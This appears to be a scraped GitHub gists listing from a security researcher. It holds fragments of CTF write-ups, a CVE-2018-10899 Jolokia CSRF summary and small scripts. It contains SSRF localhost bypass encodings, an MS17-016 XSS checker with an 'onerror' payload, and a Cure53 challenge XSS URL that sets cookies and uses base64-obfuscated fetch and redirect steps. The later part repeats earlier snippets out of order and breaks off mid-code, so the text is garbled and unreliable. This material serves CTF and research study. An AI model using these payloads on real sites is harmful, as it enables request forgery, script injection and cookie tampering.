Martin Bajanik bayotop

## bypasses.txt
# SSRF localhost (@omespino)

http://127.0.0.1
http://[::]/                # ipv6
http://0/
http://localtest.me         # dns to 127.0.0.1
http://2130706433/          # decimal
http://0x7f000001/          # hex
http://0x7f.0x00.0x00.0x01  # hex
http://0177.0.0.01          # octal

## last-evet-id.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              4 stars
            
          
                bayotop
                / last-evet-id.md
            
            
              Last active
              June 28, 2022 15:10
            
              
                Sending arbitrary Last-Event-ID header values across origins using the EventSource API.
              
          
    The EventSource API
The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.
https://developer.mozilla.org/en-US/docs/Web/API/EventSource
Last-Event-ID
Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.

  
## h1-702-web-ctf.md

      
              1 file
            
          
              1 fork
            
          
              1 comment
            
          
              7 stars
            
          
                bayotop
                / h1-702-web-ctf.md
            
            
              Created
              June 20, 2018 20:01
            
              
                h1-702 CTF 2018 - Web 1
              
          
    Description


Announcement: https://www.hackerone.com/blog/Jackpot-h1-702-2018-CTF-here-Win-Trip-Biggest-Live-hacking-Event-2018
CTF: https://h1-702-2018.h1ctf.com/

Web challenge 1

The first challenge was available at http://159.203.178.9. The root page introduces a hidden service that allows to securely store notes. The goal is to find a flag hidden in one of these notes.
Finding the service


## typed.js
fetch('http://165.227.165.4:8888');

## jolokia-1.6.0-csrf.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                bayotop
                / jolokia-1.6.0-csrf.md
            
            
              Created
              July 3, 2019 07:21
            
              
                CVE-2018-10899: CSRF in Jolokia 1.6.0
              
          
    Summary
Jolokia 1.6.0 is vulnerable to CSRF. This holds true for properly configured instances with strict checking for origin and referrer headers. The issue was fixed in version 1.6.1.
Red Hat Security Advisory: https://access.redhat.com/security/cve/cve-2018-10899
Details
In version 1.2.1 Jolokia introduced a <strict-checking/> option within the Cross-Origin Resource Sharing policy defined in jolokia-access.xml to prevent CSRF (4.1.5).

  
## gauth.py
# https://cloud.google.com/iap/docs/authentication-howto

import json
import time

from jwt import JWT, jwk_from_pem
import requests

jwt = JWT()

## MS17-016.py
import requests
from requests import ConnectionError
import sys

requesttemplate = "http://%s/";
payload = "uncpath/<img src=x onerror=alert();>:"
check = { "Microsoft", "ASP.NET", "IIS" }
confirm = { "500.19", "<img src=x onerror=alert();>:" }

if __name__ == "__main__":

## h1ctf.py
import sys
import binascii

data = bytearray.fromhex("7b0a20a0226576e56e7422ba202270e1737377ef72645fe368616ee765222c8a202022f5736572ee616d65a23a2022e2636f6cec696e22ac0a2020a26f6c64df706173f3776f72e4223a20a23a5c78c3375c78c6345c6edc784146a9293743dc783135dc784430dc784633dc784445e9553b22ac0a2020a26e6577df706173f3776f72e4223a20a2395c78c6415c78b9395c78c3415c78c5445c78c6325853c75c7844c42d5c78c3325c78b8457a48eb222c0aa0202274e96d6573f4616d70a23a2031b5303138b5383836b03030308a7d0a")
corrected = bytearray()

# Print original data given
for n in data:
    sys.stdout.write(chr(n))

## hrefs.py
import re
import sys

VULNERABLE_HREF = r'href: [^"].+[^\s]?'
DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'

#false_positives = ("this.props.team.", "constants.")

def find_state_candidates(name, states):

## cure53-2018.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                bayotop
                / cure53-2018.md
            
            
              Last active
              May 30, 2018 06:51
            
              
                Cure53 - Chinese New Year Challenge 2018
              
          
    Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):
https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into submit.cure53.berlin, the above has to be URL decoded once:
https://henhouse.cure53.berlin?value=
	# SSRF localhost (@omespino)

	http://127.0.0.1
	http://[::]/ # ipv6
	http://0/
	http://localtest.me # dns to 127.0.0.1
	http://2130706433/ # decimal
	http://0x7f000001/ # hex
	http://0x7f.0x00.0x00.0x01 # hex
	http://0177.0.0.01 # octal
	# https://cloud.google.com/iap/docs/authentication-howto

	import json
	import time

	from jwt import JWT, jwk_from_pem
	import requests

	jwt = JWT()
	import requests
	from requests import ConnectionError
	import sys

	requesttemplate = "http://%s/";
	payload = "uncpath/<img src=x onerror=alert();>:"
	check = { "Microsoft", "ASP.NET", "IIS" }
	confirm = { "500.19", "<img src=x onerror=alert();>:" }

	if __name__ == "__main__":
	import sys
	import binascii

	data = bytearray.fromhex("7b0a20a0226576e56e7422ba202270e1737377ef72645fe368616ee765222c8a202022f5736572ee616d65a23a2022e2636f6cec696e22ac0a2020a26f6c64df706173f3776f72e4223a20a23a5c78c3375c78c6345c6edc784146a9293743dc783135dc784430dc784633dc784445e9553b22ac0a2020a26e6577df706173f3776f72e4223a20a2395c78c6415c78b9395c78c3415c78c5445c78c6325853c75c7844c42d5c78c3325c78b8457a48eb222c0aa0202274e96d6573f4616d70a23a2031b5303138b5383836b03030308a7d0a")
	corrected = bytearray()

	# Print original data given
	for n in data:
	sys.stdout.write(chr(n))
	import re
	import sys

	VULNERABLE_HREF = r'href: [^"].+[^\s]?'
	DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
	STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'

	#false_positives = ("this.props.team.", "constants.")

	def find_state_candidates(name, states):